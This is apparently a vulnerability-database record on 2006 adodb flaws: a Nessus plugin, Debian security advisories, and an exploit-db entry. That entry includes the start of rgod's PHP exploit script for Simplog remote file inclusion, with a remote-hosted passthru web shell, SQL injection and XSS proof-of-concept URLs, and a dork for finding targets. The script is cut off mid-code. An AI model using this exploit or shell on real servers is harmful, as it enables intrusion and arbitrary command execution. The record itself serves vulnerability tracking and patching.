CVE-2006-0146\n Andreas Sandblad discovered that improper user input\n sanitisation results in a potential remote SQL injection\n vulnerability enabling an attacker to compromise\n applications, access or modify data, or exploit\n vulnerabilities in the underlying database\n implementation. This requires the MySQL root password to\n be empty. It is fixed by limiting access to the script\n in question.\n\n - CVE-2006-0147\n A dynamic code evaluation vulnerability allows remote\n attackers to execute arbitrary PHP functions via the\n 'do' parameter.\n\n - CVE-2006-0410\n Andy Staudacher discovered a SQL injection vulnerability\n due to insufficient input sanitising that allows remote\n attackers to execute arbitrary SQL commands.\n\n - CVE-2006-0806\n GulfTech Security Research discovered multiple\n cross-site scripting vulnerabilities due to improper\n user-supplied input sanitisation. Attackers can exploit\n these vulnerabilities to cause arbitrary scripts to be\n executed in the browser of an unsuspecting user's\n machine, or result in the theft of cookie-based\n authentication credentials.", "edition": 28, "published": "2006-10-14T00:00:00", "title": "Debian DSA-1031-1 : cacti - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "modified": "2006-10-14T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.1", "p-cpe:/a:debian:debian_linux:cacti"], "id": "DEBIAN_DSA-1031.NASL", "href": "https://www.tenable.com/plugins/nessus/22573", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1031. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22573);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2006-0146\", \"CVE-2006-0147\", \"CVE-2006-0410\", \"CVE-2006-0806\");\n script_bugtraq_id(16187, 16364, 16720);\n script_xref(name:\"DSA\", value:\"1031\");\n\n script_name(english:\"Debian DSA-1031-1 : cacti - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\ncacti, a frontend to rrdtool for monitoring systems and services. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems :\n\n - CVE-2006-0146\n Andreas Sandblad discovered that improper user input\n sanitisation results in a potential remote SQL injection\n vulnerability enabling an attacker to compromise\n applications, access or modify data, or exploit\n vulnerabilities in the underlying database\n implementation. This requires the MySQL root password to\n be empty. It is fixed by limiting access to the script\n in question.\n\n - CVE-2006-0147\n A dynamic code evaluation vulnerability allows remote\n attackers to execute arbitrary PHP functions via the\n 'do' parameter.\n\n - CVE-2006-0410\n Andy Staudacher discovered a SQL injection vulnerability\n due to insufficient input sanitising that allows remote\n attackers to execute arbitrary SQL commands.\n\n - CVE-2006-0806\n GulfTech Security Research discovered multiple\n cross-site scripting vulnerabilities due to improper\n user-supplied input sanitisation. Attackers can exploit\n these vulnerabilities to cause arbitrary scripts to be\n executed in the browser of an unsuspecting user's\n machine, or result in the theft of cookie-based\n authentication credentials.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=349985\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=358872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0146\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0147\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2006-0806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2006/dsa-1031\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the cacti package.\n\nThe old stable distribution (woody) is not affected by these problems.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.8.6c-7sarge3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(89);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/10/14\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"cacti\", reference:\"0.8.6c-7sarge3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:22:48", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1029-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 8th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : libphp-adodb\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0146 CVE-2006-0147 CVE-2006-0410 CVE-2006-0806\nBugTraq IDs : 16187 16364 16720\nDebian Bugs : 349985 358872\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the 'adodb'\ndatabase abstraction layer for PHP. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2006-0146\n\n Andreas Sandblad discovered that improper user input sanitisation\n results in a potential remote SQL injection vulnerability enabling\n an attacker to compromise applications, access or modify data, or\n exploit vulnerabilities in the underlying database implementation.\n This requires the MySQL root password to be empty. It is fixed by\n limiting access to the script in question.\n\nCVE-2006-0147\n\n A dynamic code evaluation vulnerability allows remote attackers to\n execute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\n Andy Staudacher discovered an SQL injection vulnerability due to\n insufficient input sanitising that allows remote attackers to\n execute arbitrary SQL commands.\n\nCVE-2006-0806\n\n GulfTech Security Research discovered multiple cross-site\n scripting vulnerabilities due to improper user-supplied input\n sanitisation. Attackers can exploit these vulnerabilities to\n cause arbitrary scripts to be executed in the browser of an\n unsuspecting user's machine, or result in the theft of\n cookie-based authentication credentials.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 1.51-1.2.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 4.52-1sarge1.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.72-0.1.\n\nWe recommend that you upgrade your libphp-adodb package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_1.51-1.2.dsc\n Size/MD5 checksum: 548 3d374bc44425b7ba258eb8129d02349c\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_1.51-1.2.diff.gz\n Size/MD5 checksum: 2404 9e579561939b10fda54f313294407007\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_1.51.orig.tar.gz\n Size/MD5 checksum: 104759 37c041d0c73b3aa4aa7e1800f9fcd4ff\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_1.51-1.2_all.deb\n Size/MD5 checksum: 104364 e241aeaab484de2b786ac639252f71ca\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_4.52-1sarge1.dsc\n Size/MD5 checksum: 608 d4cc684374fcd789138f695142ef6042\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_4.52-1sarge1.diff.gz\n Size/MD5 checksum: 7746 a8e033f1770717a8990ed498f477dc21\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_4.52.orig.tar.gz\n Size/MD5 checksum: 375443 427ff438939924b32d538eeca4b73743\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_4.52-1sarge1_all.deb\n Size/MD5 checksum: 349856 0ad35b7081f80aa31e44ff6f1473d960\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2006-04-08T00:00:00", "published": "2006-04-08T00:00:00", "id": "DEBIAN:DSA-1029-1:B7B84", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00112.html", "title": "[SECURITY] [DSA 1029-1] New libphp-adodb packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:23:05", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1031-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 8th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : cacti\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0146 CVE-2006-0147 CVE-2006-0410 CVE-2006-0806\nBugTraq IDs : 16187 16364 16720\nDebian Bugs : 349985 358872\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\ncacti, a frontend to rrdtool for monitoring systems and services. The\nCommon Vulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2006-0146\n\n Andreas Sandblad discovered that improper user input sanitisation\n results in a potential remote SQL injection vulnerability enabling\n an attacker to compromise applications, access or modify data, or\n exploit vulnerabilities in the underlying database implementation.\n This requires the MySQL root password to be empty. It is fixed by\n limiting access to the script in question.\n\nCVE-2006-0147\n\n A dynamic code evaluation vulnerability allows remote attackers to\n execute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\n Andy Staudacher discovered an SQL injection vulnerability due to\n insufficient input sanitising that allows remote attackers to\n execute arbitrary SQL commands.\n\nCVE-2006-0806\n\n GulfTech Security Research discovered multiple cross-site\n scripting vulnerabilities due to improper user-supplied input\n sanitisation. Attackers can exploit these vulnerabilities to\n cause arbitrary scripts to be executed in the browser of an\n unsuspecting user's machine, or result in the theft of\n cookie-based authentication credentials.\n\nThe old stable distribution (woody) is not affected by these problems.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.8.6c-7sarge3.\n\nFor the unstable distribution these problems will be fixed soon.\n\nWe recommend that you upgrade your cacti package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge3.dsc\n Size/MD5 checksum: 597 9ad5bc63bba985893a14044dd5b37592\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge3.diff.gz\n Size/MD5 checksum: 43881 b9c59a54f46b820480f4ee4fb7402074\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c.orig.tar.gz\n Size/MD5 checksum: 1046586 b4130300f671e773ebea3b8f715912c1\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge3_all.deb\n Size/MD5 checksum: 1058818 afe7c7131aacf8eaaaee0a3c39933834\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2006-04-08T00:00:00", "published": "2006-04-08T00:00:00", "id": "DEBIAN:DSA-1031-1:90EAF", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00114.html", "title": "[SECURITY] [DSA 1031-1] New cacti packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:37", "bulletinFamily": "unix", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1030-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 8th, 2006 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : moodle\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE IDs : CVE-2006-0146 CVE-2006-0147 CVE-2006-0410 CVE-2006-0806\nBugTraq IDs : 16187 16364 16720\nDebian Bugs : 349985 358872\n\nSeveral vulnerabilities have been discovered in libphp-adodb, the\n'adodb' database abstraction layer for PHP, which is embedded in\nmoodle, a course management system for online learning. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2006-0146\n\n Andreas Sandblad discovered that improper user input sanitisation\n results in a potential remote SQL injection vulnerability enabling\n an attacker to compromise applications, access or modify data, or\n exploit vulnerabilities in the underlying database implementation.\n This requires the MySQL root password to be empty. It is fixed by\n limiting access to the script in question.\n\nCVE-2006-0147\n\n A dynamic code evaluation vulnerability allows remote attackers to\n execute arbitrary PHP functions via the 'do' parameter.\n\nCVE-2006-0410\n\n Andy Staudacher discovered an SQL injection vulnerability due to\n insufficient input sanitising that allows remote attackers to\n execute arbitrary SQL commands.\n\nCVE-2006-0806\n\n GulfTech Security Research discovered multiple cross-site\n scripting vulnerabilities due to improper user-supplied input\n sanitisation. Attackers can exploit these vulnerabilities to\n cause arbitrary scripts to be executed in the browser of an\n unsuspecting user's machine, or result in the theft of\n cookie-based authentication credentials.\n\nThe old stable distribution (woody) does not contain moodle packages.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 1.4.4.dfsg.1-3sarge1.\n\nFor the unstable distribution these problems will be fixed soon.\n\nWe recommend that you upgrade your moodle package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/m/moodle/moodle_1.4.4.dfsg.1-3sarge1.dsc\n Size/MD5 checksum: 616 5d572ce0e8c11034e62fd3a20b0f9d67\n http://security.debian.org/pool/updates/main/m/moodle/moodle_1.4.4.dfsg.1-3sarge1.diff.gz\n Size/MD5 checksum: 12159 2868972a9a5b94eb9d8a2575e7fc4937\n http://security.debian.org/pool/updates/main/m/moodle/moodle_1.4.4.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 9717561 50f0618c0711a7eed3725fea0dd45109\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/m/moodle/moodle_1.4.4.dfsg.1-3sarge1_all.deb\n Size/MD5 checksum: 9161960 caabcd722dd1a202e95d1bae8c751bf4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2006-04-08T00:00:00", "published": "2006-04-08T00:00:00", "id": "DEBIAN:DSA-1030-1:0376F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2006/msg00113.html", "title": "[SECURITY] [DSA 1030-1] New moodle packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "cvelist": ["CVE-2006-0410", "CVE-2006-0806", "CVE-2006-0147", "CVE-2006-0146"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- --------------------------------------------------------------------------\r\nDebian Security Advisory DSA 1029-1 security@debian.org\r\nhttp://www.debian.org/security/ Martin Schulze\r\nApril 8th, 2006 http://www.debian.org/security/faq\r\n- --------------------------------------------------------------------------\r\n\r\nPackage : libphp-adodb\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE IDs : CVE-2006-0146 CVE-2006-0147 CVE-2006-0410 CVE-2006-0806\r\nBugTraq IDs : 16187 16364 16720\r\nDebian Bugs : 349985 358872\r\n\r\nSeveral vulnerabilities have been discovered in libphp-adodb, the 'adodb'\r\ndatabase abstraction layer for PHP. The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2006-0146\r\n\r\n Andreas Sandblad discovered that improper user input sanitisation\r\n results in a potential remote SQL injection vulnerability enabling\r\n an attacker to compromise applications, access or modify data, or\r\n exploit vulnerabilities in the underlying database implementation.\r\n This requires the MySQL root password to be empty. It is fixed by\r\n limiting access to the script in question.\r\n\r\nCVE-2006-0147\r\n\r\n A dynamic code evaluation vulnerability allows remote attackers to\r\n execute arbitrary PHP functions via the 'do' parameter.\r\n\r\nCVE-2006-0410\r\n\r\n Andy Staudacher discovered an SQL injection vulnerability due to\r\n insufficient input sanitising that allows remote attackers to\r\n execute arbitrary SQL commands.\r\n\r\nCVE-2006-0806\r\n\r\n GulfTech Security Research discovered multiple cross-site\r\n scripting vulnerabilities due to improper user-supplied input\r\n sanitisation. Attackers can exploit these vulnerabilities to\r\n cause arbitrary scripts to be executed in the browser of an\r\n unsuspecting user's machine, or result in the theft of\r\n cookie-based authentication credentials.\r\n\r\nFor the old stable distribution (woody) these problems have been fixed in\r\nversion 1.51-1.2.\r\n\r\nFor the stable distribution (sarge) these problems have been fixed in\r\nversion 4.52-1sarge1.\r\n\r\nFor the unstable distribution (sid) these problems have been fixed in\r\nversion 4.72-0.1.\r\n\r\nWe recommend that you upgrade your libphp-adodb package.\r\n\r\n\r\nUpgrade Instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 3.0 alias woody\r\n- --------------------------------\r\n\r\n Source archives:\r\n\r\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_1.51-1.2.dsc\r\n Size/MD5 checksum: 548 3d374bc44425b7ba258eb8129d02349c\r\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_1.51-1.2.diff.gz\r\n Size/MD5 checksum: 2404 9e579561939b10fda54f313294407007\r\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_1.51.orig.tar.gz\r\n Size/MD5 checksum: 104759 37c041d0c73b3aa4aa7e1800f9fcd4ff\r\n\r\n Architecture independent components:\r\n\r\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_1.51-1.2_all.deb\r\n Size/MD5 checksum: 104364 e241aeaab484de2b786ac639252f71ca\r\n\r\n\r\nDebian GNU/Linux 3.1 alias sarge\r\n- --------------------------------\r\n\r\n Source archives:\r\n\r\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_4.52-1sarge1.dsc\r\n Size/MD5 checksum: 608 d4cc684374fcd789138f695142ef6042\r\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_4.52-1sarge1.diff.gz\r\n Size/MD5 checksum: 7746 a8e033f1770717a8990ed498f477dc21\r\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_4.52.orig.tar.gz\r\n Size/MD5 checksum: 375443 427ff438939924b32d538eeca4b73743\r\n\r\n Architecture independent components:\r\n\r\n http://security.debian.org/pool/updates/main/libp/libphp-adodb/libphp-adodb_4.52-1sarge1_all.deb\r\n Size/MD5 checksum: 349856 0ad35b7081f80aa31e44ff6f1473d960\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\r\n\r\niD8DBQFEN6L5W5ql+IAeqTIRAngSAJ9G445snZWyCv9REMCT1ywpTCgQKgCdGfJm\r\nGMh1wRaujgNdYP9Q+atuDM8=\r\n=35sf\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2006-04-10T00:00:00", "published": "2006-04-10T00:00:00", "id": "SECURITYVULNS:DOC:12141", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12141", "title": "[SECURITY] [DSA 1029-1] New libphp-adodb packages fix several vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:38:34", "description": "Simplog <= 0.9.2 (s) Remote Commands Execution Exploit. CVE-2006-0146,CVE-2006-0147,CVE-2006-1776,CVE-2006-1777,CVE-2006-1778,CVE-2006-1779,CVE-2006-2029....", "published": "2006-04-11T00:00:00", "type": "exploitdb", "title": "Simplog <= 0.9.2 s Remote Commands Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-1779", "CVE-2006-1778", "CVE-2006-1776", "CVE-2006-0147", "CVE-2006-1777", "CVE-2006-2029", "CVE-2006-0146"], "modified": "2006-04-11T00:00:00", "id": "EDB-ID:1663", "href": "https://www.exploit-db.com/exploits/1663/", "sourceData": "#!/usr/bin/php -q -d short_open_tag=on\n<?\necho \"Simplog <= 0.9.2 \\\"s\\\" remote cmmnds xctn\\r\\n\";\necho \"by rgod rgod@autistici.org\\r\\n\";\necho \"site: http://retrogod.altervista.org\\r\\n\\r\\n\";\necho \"dork: intext:\\\"Powered by simplog\\\"\\r\\n\\r\\n\";\n\nif ($argc<5) {\necho \"Usage: php \".$argv[0].\" host path location cmd OPTIONS\\r\\n\";\necho \"host: target server (ip/hostname)\\r\\n\";\necho \"path: path to simplog\\r\\n\";\necho \"location: an arbitrary location with the code to include\\r\\n\";\necho \"cmd: a shell command\\r\\n\";\necho \"Options:\\r\\n\";\necho \" -p[port]: specify a port other than 80\\r\\n\";\necho \" -P[ip:port]: specify a proxy\\r\\n\";\necho \"Examples:\\r\\n\";\necho \"php \".$argv[0].\" localhost /simplog/ http://somehost.com ls -la\\r\\n\";\necho \"php \".$argv[0].\" localhost /simplog/ http://somehost.com/subdir ls -la -p81\\r\\n\";\necho \"php \".$argv[0].\" localhost / http://somehost.com cat ./../config.php -P1.1.1.1:80\\r\\n\\r\\n\";\necho \"note, you need this code in http://somehost.com/suntzu.html:\\r\\n\";\necho \"<?php\\r\\n\";\necho \"if (get_magic_quotes_gpc()){\\$_REQUEST[\\\"cmd\\\"]=stripslashes(\\$_REQUEST[\\\"cmd\\\"]);}\\r\\n\";\necho \"ini_set(\\\"max_execution_time\\\",0);\\r\\n\";\necho \"echo \\\"*delim*\\\";\\r\\n\";\necho \"passthru(\\$_REQUEST[\\\"cmd\\\"]);\\r\\n\";\necho \"echo \\\"*delim*\\\";\\r\\n\";\necho \"?>\\r\\n\";\ndie;\n}\n\n/*\n software site: http://www.simplog.org/\n\n description: \"Simplog provides an easy way for users to add blogging capabilities\n to their existing websites. Simplog is written in PHP and compatible with multiple\n databases. Simplog also features an RSS/Atom aggregator/reader.\n Powerful, yet simple.......\"\n\n\n i) vulnerable code in doc/index.php at lines:\n ...\n <?php\n\n\tif(isset($_REQUEST['s'])) {\n\t\tinclude($_REQUEST['s'].\".html\");\n\t}\n\n ?>\n ...\n\n nice code, isn't it? :)\n poc:\n http://[target]/[path]/doc/index.php?cmd=ls%20-la&s=http://somehost.com/suntzu\n (but you can submit arguments even trough cookies or POST data...)\n\n or:\n http://[target]/[path]/doc/index.php?s=../../../../var/httpd/logs/error_log%00\n\n ii)\n http://[target]/[path]/index.php?blogid=[sql]\n http://[target]/[path]/archive.php?blogid=[sql]\n http://[target]/[path]/archive.php?m=[sql]\n http://[target]/[path]/archive.php?y=[sql]\n\n iii)\n http://[target]/[path]/adodb/server.php?sql=[sql]\n http://[target]/[path]/adodb/tests/tmssql.php?do=phpinfo\n\n iv) xss:\n http://[target]/[path]/login.php?btag=<script>alert(document.cookie)</script>\n\n this is the exploit for i), works with allow_url_fopen = On\n */\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\nfunction quick_dump($string)\n{\n $result='';$exa='';$cont=0;\n for ($i=0; $i<=strlen($string)-1; $i++)\n {\n if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))\n {$result.=\" .\";}\n else\n {$result.=\" \".$string[$i];}\n if (strlen(dechex(ord($string[$i])))==2)\n {$exa.=\" \".dechex(ord($string[$i]));}\n else\n {$exa.=\" 0\".dechex(ord($string[$i]));}\n $cont++;if ($cont==15) {$cont=0; $result.=\"\\r\\n\"; $exa.=\"\\r\\n\";}\n }\n return $exa.\"\\r\\n\".$result;\n}\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\nfunction sendpacketii($packet)\n{\n global $proxy, $host, $port, $html, $proxy_regex;\n if ($proxy=='') {\n $ock=fsockopen(gethostbyname($host),$port);\n if (!$ock) {\n echo 'No response from '.$host.':'.$port; die;\n }\n }\n else {\n\t$c = preg_match($proxy_regex,$proxy);\n if (!$c) {\n echo 'Not a valid proxy...';die;\n }\n $parts=explode(':',$proxy);\n echo \"Connecting to \".$parts[0].\":\".$parts[1].\" proxy...\\r\\n\";\n $ock=fsockopen($parts[0],$parts[1]);\n if (!$ock) {\n echo 'No response from proxy...';die;\n\t}\n }\n fputs($ock,$packet);\n if ($proxy=='') {\n $html='';\n while (!feof($ock)) {\n $html.=fgets($ock);\n }\n }\n else {\n $html='';\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {\n $html.=fread($ock,1);\n }\n }\n fclose($ock);\n #debug\n #echo \"\\r\\n\".$html;\n}\n\n$host=$argv[1];\n$path=$argv[2];\n$loc=$argv[3];\nif (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))\n{die(\"Check the path, it must begin and end with a trailing slash\\r\\n\");}\n$port=80;\n$proxy=\"\";\n$cmd=\"\";\nfor ($i=4; 